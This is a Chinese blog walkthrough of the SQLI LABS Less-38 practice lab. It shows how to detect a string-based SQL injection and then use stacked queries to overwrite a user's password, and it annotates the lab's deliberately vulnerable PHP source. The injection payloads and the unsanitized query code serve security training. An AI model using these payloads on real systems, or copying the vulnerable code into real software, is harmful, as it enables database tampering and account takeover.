SQLI LABS | Less-38 GET-Stacked Query Injection-String

关注这个靶场的其它相关笔记:SQLI LABS ------ 靶场笔记合集-CSDN博客

0x01:过关流程

输入下面的链接进入靶场(如果你的地址和我不一样,按照你本地的环境来):

复制代码
 http://localhost/sqli-labs/Less-38/

从本关开始,就进入了堆叠注入的部分了。我们的目标也从发掘注入点、获取数据库信息变为了 篡改数据库信息。那么首先明确一下目标吧,使用堆叠注入篡改任意用户的密码:

首先,用 BP 抓包,然后用时间盲注的字典去爆破后端 SQL 模板:

如下,是一个可以使用的 Payload 模板:

sql 复制代码
 0' | sleep(3) | '1

通过上面的模板,我们可以推测出其后端的 SQL 模板为:

sql 复制代码
 select * from users where id='$_GET["id"]';

我们可以使用如下 Payload 做一个测试,进行校验:

sql 复制代码
 1' and 1='1   => 若页面回显内容,则证明存在漏洞
 1' and 1='0   => 若页面回显为空,则证明存在漏洞

明确了漏洞存在,且知道 Payload 该怎么写后,就是收集数据库信息、收集数据表信息 。。。 这些笔者在这里节省时间就不说了,直接当作已知条件,下面直接开始上堆叠注入的 Payload:

sql 复制代码
 -- 修改 id = 1 的用户密码为 HACKER (那些表啥的都是靠信息收集,收集来的)
 1';update users set password='HACKER' where id=1;#

如上,我们已经能够随意篡改用户密码了。至此,SQLI LABS Less-38 GET-Stacked Query Injection-String 成功过关。

0x02:源码分析

下面是 SQLI LABS Less-38 GET-Stacked Query Injection-String 后端的部分源码,以及笔者做的笔记:

php 复制代码
 <?php
 // take the variables 
 if (isset($_GET['id'])) {
     // 获取前端传递过来的参数 
     $id = $_GET['id'];
     //logging the connection parameters to a file for analysis.
     $fp = fopen('result.txt', 'a');
     fwrite($fp, 'ID:' . $id . "\n");
     fclose($fp);
 ​
     // connectivity
     //mysql connections for stacked query examples.
     $con1 = mysqli_connect($host, $dbuser, $dbpass, $dbname);
     // Check connection
     if (mysqli_connect_errno($con1)) {
         echo "Failed to connect to MySQL: " . mysqli_connect_error();
     } else {
         @mysqli_select_db($con1, $dbname) or die("Unable to connect to the database: $dbname");
     }
 ​
     // 直接拼接进 SQL 模板中
     $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
     /* execute multi query */
     // mysqli_multi_query => 执行一个或多个针对数据库的查询,多个查询用分号进行分隔。
     if (mysqli_multi_query($con1, $sql)) {
 ​
         /* store first result set */
         // mysqli_stroe_result => 转移将上一次查询返回的结果集(多个结果)
         if ($result = mysqli_store_result($con1)) {
             // 返回第一个结果????不过后面还是执行了
             if ($row = mysqli_fetch_row($result)) {
                 echo '<font size = "5" color= "#00FF00">';
                 printf("Your Username is : %s", $row[1]);
                 echo "<br>";
                 printf("Your Password is : %s", $row[2]);
                 echo "<br>";
                 echo "</font>";
             }
             //            mysqli_free_result($result);
         }
         /* print divider */
         // mysqli_more_results => 如果当前执行的查询存在多个结果,返回 "真",否则返回 "假"
         if (mysqli_more_results($con1)) {
             //printf("-----------------\n");
         }
         //while (mysqli_next_result($con1));
     } else {
         echo '<font size="5" color= "#FFFF00">';
         print_r(mysqli_error($con1));
         echo "</font>";
     }
     /* close connection */
     mysqli_close($con1);
 } else {
     echo "Please input the ID as parameter with numeric value";
 }
 ​
 ?>
相关推荐
passerby60614 小时前
完成前端时间处理的另一块版图
前端·github·web components
掘了4 小时前
「2025 年终总结」在所有失去的人中,我最怀念我自己
前端·后端·年终总结
崔庆才丨静觅4 小时前
实用免费的 Short URL 短链接 API 对接说明
前端
崔庆才丨静觅5 小时前
5分钟快速搭建 AI 平台并用它赚钱!
前端
崔庆才丨静觅5 小时前
比官方便宜一半以上!Midjourney API 申请及使用
前端
Moment5 小时前
富文本编辑器在 AI 时代为什么这么受欢迎
前端·javascript·后端
崔庆才丨静觅5 小时前
刷屏全网的“nano-banana”API接入指南!0.1元/张量产高清创意图,开发者必藏
前端
剪刀石头布啊5 小时前
jwt介绍
前端
爱敲代码的小鱼5 小时前
AJAX(异步交互的技术来实现从服务端中获取数据):
前端·javascript·ajax
Cobyte6 小时前
AI全栈实战:使用 Python+LangChain+Vue3 构建一个 LLM 聊天应用
前端·后端·aigc